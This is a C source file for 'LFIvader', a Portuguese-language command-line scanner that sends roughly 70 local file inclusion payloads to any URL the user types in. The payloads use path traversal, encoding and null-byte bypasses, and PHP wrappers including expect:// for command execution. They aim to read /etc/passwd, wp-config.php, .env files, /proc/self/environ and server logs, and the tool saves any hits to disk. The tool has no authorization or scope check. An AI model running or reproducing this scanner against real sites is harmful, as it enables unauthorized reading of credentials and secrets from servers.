LFIvader.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <unistd.h>
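/*
 * Clear the terminal and move the cursor to the top-left corner.
 *
 * Writes the ANSI "erase display" and "cursor home" sequences directly.
 * The previous system("clear") started a shell and resolved `clear` through
 * PATH, so which binary ran depended on the caller's environment; the rest
 * of this file already relies on ANSI escape sequences for colour.
 */
void limpa(void)
{
    fputs("\033[2J\033[H", stdout);
    fflush(stdout);
}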
/*
 * Print the program banner to stdout, one array entry per line.
 */
void imprime_banner() {
    static const char *const linhas[] = {
        "⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠋⠉⠁⠄⠄⠈⠙⠻⣿⣿⣿⣿",
        "⣿⣿⣿⣿⣿⣿⠟⠁⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠙⢿⣿",
        "⣿⣿⣿⣿⡿⠃⠄⠄⠄⢀⣀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠈⢿",
        "⣿⣿⣿⡟⠄⠄⠄⠄⠐⢻⣿⣿⣿⣷⡄⠄⠄⠄⠄⠄⠄⠈",
        "⣿⣿⣿⠃⠄⠄⠄⢀⠴⠛⠙⣿⣿⡿⣿⣦⠄⠄⠄⠄⠄⠄",
        "⣿⣿⠃⠄⢠⡖⠉⠄⠄⠄⣠⣿⡏⠄⢹⣿⠄⠄⠄⠄⠄⢠",
        "⣿⠃⠄⠄⢸⣧⣤⣤⣤⢾⣿⣿⡇⠄⠈⢻⡆⠄⠄⠄⠄⣾",
        "⠁⠄⠄⠄⠈⠉⠛⢿⡟⠉⠉⣿⣷⣀⠄⠄⣿⡆⠄⠄⢠⣿",
        "⠄⠄⠄⠄⠄⠄⢠⡿⠿⢿⣷⣿⣿⣿⣿⣿⠿⠃⠄⠄⣸⣿",
        "⠄⠄⠄⠄⠄⢀⡞⠄⠄⠄⠈⣿⣿⣿⡟⠁⠄⠄⠄⠄⣿⣿",
        "⠄⠄⠄⠄⠄⢸⠄⠄⠄⠄⢀⣿⣿⡟⠄⠄⠄⠄⠄⢠⣿⣿",
        "⠄⠄⠄⠄⠄⠘⠄⠄⠄⢀⡼⠛⠉⠄⠄⠄⠄⠄⠄⣼⣿⣿",
        "⠄⠄⠄⠄⠄⡇⠄⠄⢀⠎⠄⠄⠄⠄Creatd by Wesley Alexsander",
        "⠄⠄⠄⠄⢰⠃⠄⢀⠎⠄⠄⠄https://github.com/WesleyA0101"
    };
    const size_t total = sizeof linhas / sizeof linhas[0];

    // puts() appends the newline that the banner needs after every row.
    for (size_t n = 0; n < total; n++) {
        puts(linhas[n]);
    }
}
/*
 * Show a text spinner next to `msg` on stdout.
 *
 * Draws 20 frames with a 100 000 microsecond pause after each one (about two
 * seconds in total), then overwrites the line with the completion text.
 *
 * msg: label printed before the spinner character; must be a C string.
 */
void animacao_carregando(const char *msg)
{
    static const char quadros[] = "|/-\\";

    printf("%s", msg);
    fflush(stdout);

    int passo = 0;
    while (passo < 20) {
        // '\r' returns to column 0 so each frame overwrites the previous one.
        char quadro = quadros[passo % 4];
        printf("\r%s %c", msg, quadro);
        fflush(stdout);
        usleep(100000);
        passo++;
    }

    printf("\r%s Concluído! \n", msg);
}
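/*
 * libcurl write callback: append a received chunk to the caller's text buffer.
 *
 * contents: chunk delivered by libcurl (not NUL-terminated).
 * size, nmemb: element size and count; the chunk is size * nmemb bytes.
 * userp: NUL-terminated buffer of 4096 bytes, as declared by testar_lfi().
 *
 * Returns size * nmemb in every case, so libcurl never aborts the transfer
 * because the buffer is full.
 *
 * A chunk that does not fit is now truncated to the remaining room. Before,
 * such a chunk was dropped whole, so a body whose first chunk was 4096 bytes
 * or more left the buffer empty and the marker check never saw any of it,
 * while later, smaller chunks could still be appended out of order.
 */
size_t write_callback(void *contents, size_t size, size_t nmemb, void *userp)
{
    // Must match the size of the buffer passed through CURLOPT_WRITEDATA.
    enum { RESPONSE_CAPACITY = 4096 };

    size_t realsize = size * nmemb;
    char *buffer = userp;
    size_t usados = strlen(buffer);

    if (usados < RESPONSE_CAPACITY - 1) {
        // One byte is reserved for the terminator that strncat writes.
        size_t espaco = RESPONSE_CAPACITY - 1 - usados;
        size_t copiar = realsize < espaco ? realsize : espaco;
        // strncat stops at an embedded NUL, so the buffer stays a C string.
        strncat(buffer, contents, copiar);
    }
    return realsize;
}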
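/*
 * Append `dados` plus a newline to 'resultados_lfi.txt' in the current
 * working directory and report the outcome on stdout.
 *
 * dados: C string to store. The only caller in this file passes the raw
 *        response body of a remote server, so the file holds untrusted bytes.
 *
 * Success is reported only when both the write and the close succeed; the
 * earlier version printed the success message without checking either.
 */
void salvar_em_arquivos(const char *dados)
{
    FILE *arquivo = fopen("resultados_lfi.txt", "a");
    if (arquivo == NULL) {
        printf("\033[0;31;1mErro ao salvar os resultados...\033[0m\n");
        return;
    }

    int gravado = fprintf(arquivo, "%s\n", dados) >= 0;

    // fclose flushes the stdio buffer; a failure here means data was lost.
    if (fclose(arquivo) != 0) {
        gravado = 0;
    }

    if (gravado) {
        printf("\033[0;32;1mResultados salvos em 'resultados_lfi.txt'. \033[0m\n");
    } else {
        printf("\033[0;31;1mErro ao salvar os resultados...\033[0m\n");
    }
}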
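/*
 * Print a positive finding to stdout and hand the data to
 * salvar_em_arquivos().
 *
 * dados: captured response body (C string) from the tested server.
 * url_teste: the URL that produced the response.
 *
 * The body comes from a remote server and was previously echoed byte for
 * byte, which let it send escape sequences to the operator's terminal.
 * Control bytes other than newline and tab are now shown as '?'. Bytes
 * >= 0x80 pass through so UTF-8 text still renders. The copy written to
 * the results file is left unmodified.
 */
void exibir_resultados_formatados(const char *dados, const char *url_teste)
{
    printf("\033[0;32;1mVulnerabilidade LFI encontrada: %s\n", url_teste);
    printf("-----------------------------------------------------------");

    for (const unsigned char *p = (const unsigned char *)dados; *p != '\0'; p++) {
        int controle = (*p < 0x20 && *p != '\n' && *p != '\t') || *p == 0x7f;
        putchar(controle ? '?' : *p);
    }
    putchar('\n');

    printf("----------------------------------------------------------");
    salvar_em_arquivos(dados);
}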
/*
 * Report whether a response body contains one of the known marker strings.
 *
 * response: NUL-terminated response text; must not be NULL.
 *
 * Returns 1 when "root:x:", "[boot loader]" or "server_name" occurs anywhere
 * in the text, 0 otherwise. A 0 only means none of these three substrings
 * was present in the captured text; it says nothing else about the response.
 */
int verificar_resposta_valida(const char *response)
{
    static const char *const marcadores[] = {
        "root:x:",
        "[boot loader]",
        "server_name"
    };
    const size_t total = sizeof marcadores / sizeof marcadores[0];

    for (size_t k = 0; k < total; k++) {
        if (strstr(response, marcadores[k]) != NULL) {
            return 1;
        }
    }
    return 0;
}
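/*
 * Request `url` followed by each entry of the built-in path list and report
 * every response that verificar_resposta_valida() accepts.
 *
 * url: base URL as a C string, without the path suffix.
 *
 * For each entry the function builds the full URL, runs the spinner, performs
 * the request with libcurl (redirects followed), and captures at most 4095
 * bytes of the body through write_callback(). Matching responses go to
 * exibir_resultados_formatados(), which also saves them to disk.
 *
 * Changes from the earlier version:
 *  - a failed transfer is reported as a request error instead of being
 *    printed as "no valid vulnerability", which hid network failures;
 *  - a URL that does not fit in the 512-byte buffer is skipped instead of
 *    being sent truncated;
 *  - options that never change are set once, before the loop.
 */
void testar_lfi(const char *url)
{
    // Size must stay in step with the limit hard-coded in write_callback().
    char response[4096] = {0};
    const char *listlfi[] = {
        // Basic Local File Inclusions
        "/?page=../../../../etc/passwd", // Unix/Linux passwd file
        "/?file=../../../../etc/passwd", // Alternative file inclusion
        "/?view=../../../../etc/passwd", // Alternative parameter
        "/?document=../../../../etc/passwd", // Alternative parameter name
        "/?include=../../../../etc/passwd", // Alternative parameter name
        "/?content=../../../../etc/passwd", // Reading sensitive file
        "/?path=../../../../etc/passwd", // Common path parameter
        "/index.php?page=../../../../etc/passwd", // Classic PHP LFI
        "/?module=../../../../etc/passwd", // Module-specific inclusion
        "/?load=../../../../etc/passwd", // Alternative for loading files
        // Encoded Traversals
        "/?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd", // URL-encoded slashes
        "/?page=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", // URL-encoded dots and slashes (single encoding)
        "/?page=..%252F..%252F..%252F..%252Fetc%252Fpasswd", // Double-encoded slashes
        // Null Byte Injection
        "/?page=../../../../etc/passwd%00", // Null byte injection
        "/?file=../../../../etc/passwd%00", // Null byte with file param
        // Windows Files
        "/?page=../../../../boot.ini", // Windows Boot configuration
        "/?file=../../../../windows/win.ini", // Windows INI file
        "/?path=../../../../windows/system32/drivers/etc/hosts", // Windows hosts file
        // Log Files
        "/?page=../../../../var/log/apache2/access.log", // Apache access log
        "/?file=../../../../var/log/apache2/error.log", // Apache error log
        "/?page=../../../../var/log/nginx/access.log", // Nginx logs
        "/?file=../../../../var/log/nginx/error.log", // Nginx error logs
        // PHP Wrappers
        "/?page=php://filter/convert.base64-encode/resource=index", // Base64 encoding
        "/?page=php://input", // Include POST input
        "/?page=php://fd/0", // File descriptor
        // NTFS ADS
        "/?page=../../../../boot.ini::$DATA", // ADS access on NTFS
        // System Information
        "/?page=/proc/self/environ", // Access environment variables
        "/?file=/proc/self/cmdline", // Command line arguments
        "/?path=/proc/version", // Kernel version
        // CMS Configuration Files
        "/?page=../../../../wp-config.php", // WordPress config file
        "/?file=../../../../configuration.php", // Joomla config file
        "/?path=../../../../config.php", // General config file
        "/?include=../../../../app/etc/local.xml", // Magento config file
        "/?module=../../../../.env", // Laravel environment file
        // Directory Traversals
        "/?page=../index.php", // Single level up
        "/?page=../../index.php", // Two levels up
        "/?page=../../../index.php", // Three levels up
        "/?page=../../../../index.php", // Four levels up
        // Advanced LFI and Bypasses
        "/?file=....//....//....//etc/passwd", // Double slashes
        "/?file=....\\\\....\\\\....\\\\etc\\\\passwd", // Double backslashes
        "/?file=..%2f..%2f..%2f..%2fetc%2fpasswd", // Mixed encoding
        "/?file=..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts", // Windows encoding
        "/?file=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd", // UTF-8 encoded traversal
        "/?file=..%c0%ae%c0%ae%c0%ae%c0%ae/etc/passwd", // UTF-8 encoded dots
        "/?file=../../../../etc/passwd%2500", // Null byte with encoding
        "/?file=../../../../etc/passwd%00.php", // PHP extension spoofing
        // More PHP Wrappers
        "/?file=php://filter/read=convert.base64-encode/resource=../../../../etc/passwd", // Base64 encode bypass
        "/?file=php://filter/convert.base64-encode/resource=index.php", // Encode PHP file
        "/?file=php://input", // Read POST input
        "/?file=php://fd/0", // STDIN as file descriptor
        "/?file=php://temp", // PHP temp file stream
        "/?file=php://memory", // PHP memory stream
        "/?file=expect://ls", // Execute commands (if allowed)
        "/?file=zip://../../../../var/log/access.log%23file", // Zip wrapper to read files
        "/?file=phar://../../../../test.phar", // Phar wrapper
        // Log files by absolute path
        "/?file=/var/log/apache2/access.log", // Apache access log
        "/?file=/var/log/nginx/access.log", // Nginx access log
        "/?file=/var/log/httpd/error.log", // HTTPD error log
        // Container and Virtual Environments
        "/?file=/proc/self/mounts", // Active mounts in the system
        "/?file=/proc/self/cgroup", // Cgroup details (Docker, Kubernetes)
        "/?file=/proc/self/fd/0", // Open file descriptor 0
        "/?file=/proc/self/fd/1", // Open file descriptor 1
        "/?file=/proc/self/exe", // Current executable file
        // CMS-specific Configs
        "/?file=../../../../wp-content/debug.log", // WordPress debug logs
        "/?file=../../../../wp-config.php~", // WordPress backup file
        "/?file=../../../../storage/logs/laravel.log", // Laravel logs
        "/?file=../../../../configuration.php-dist", // Joomla sample config
    };
    const size_t total_listlfi = sizeof(listlfi) / sizeof(listlfi[0]);

    curl_global_init(CURL_GLOBAL_DEFAULT);
    CURL *curl = curl_easy_init();
    if (!curl) {
        printf("Erro ao inicializar cURL.\n");
        curl_global_cleanup();
        return;
    }

    // These options are the same for every request, so set them once.
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, response);
    curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
    // NOTE(review): no transfer timeout (CURLOPT_TIMEOUT) or redirect cap
    // (CURLOPT_MAXREDIRS) is configured, so a server that stalls or keeps
    // redirecting holds this loop open; consider setting both.

    for (size_t i = 0; i < total_listlfi; i++) {
        char full_url[512];
        int escritos = snprintf(full_url, sizeof(full_url), "%s%s", url, listlfi[i]);
        if (escritos < 0 || (size_t)escritos >= sizeof(full_url)) {
            // A truncated URL would test something other than the listed path.
            printf("\033[0;31;1m[URL muito longa, teste ignorado]: %s%s\n", url, listlfi[i]);
            continue;
        }

        animacao_carregando("Testando LFI");
        curl_easy_setopt(curl, CURLOPT_URL, full_url);

        // Start from an empty buffer so the marker check only sees this response.
        memset(response, 0, sizeof(response));
        printf("Testando: %s\n", full_url);

        CURLcode res = curl_easy_perform(curl);
        if (res != CURLE_OK) {
            // A transport failure is not a negative result; report it as such.
            printf("\033[0;31;1m[Erro na requisição, código cURL %d]: %s\n", (int)res, full_url);
        } else if (verificar_resposta_valida(response)) {
            exibir_resultados_formatados(response, full_url);
        } else {
            printf("\033[0;31;1m[Sem vulnerabilidade válida]: %s\n", full_url);
        }
    }

    curl_easy_cleanup(curl);
    curl_global_cleanup();
}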
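/*
 * Entry point: show the banner, read the base URL from stdin and run the
 * checks against it.
 *
 * Returns 0 after a completed run, 1 when no URL could be read.
 *
 * The URL is read with a field width of 255 so it always fits in the
 * 256-byte buffer; the earlier unbounded "%s" let any longer input write
 * past the end of `url` on the stack. The scanf result is checked so an
 * empty or closed stdin no longer leads to reading an uninitialised buffer.
 */
int main(void)
{
    limpa();
    imprime_banner();

    char url[256];
    printf("\nDigite a URL do alvo (ex: https://www.alvo.com): ");
    if (scanf("%255s", url) != 1) {
        printf("\033[0;31;1mErro ao ler a URL.\033[0m\n");
        return 1;
    }

    animacao_carregando("Cerregando...");
    printf("\033[0;33;1mIniciando testes de LFI no alvo: %s\n", url);
    printf("\033[0;36;1mEste processo pode demorar dependendo da resposta do servidor.\n");
    testar_lfi(url);
    printf("\033[0;32;1mTeste concluído. Resultados podem ser encontrados em 'resultados_lfi.txt'.\n");
    return 0;
}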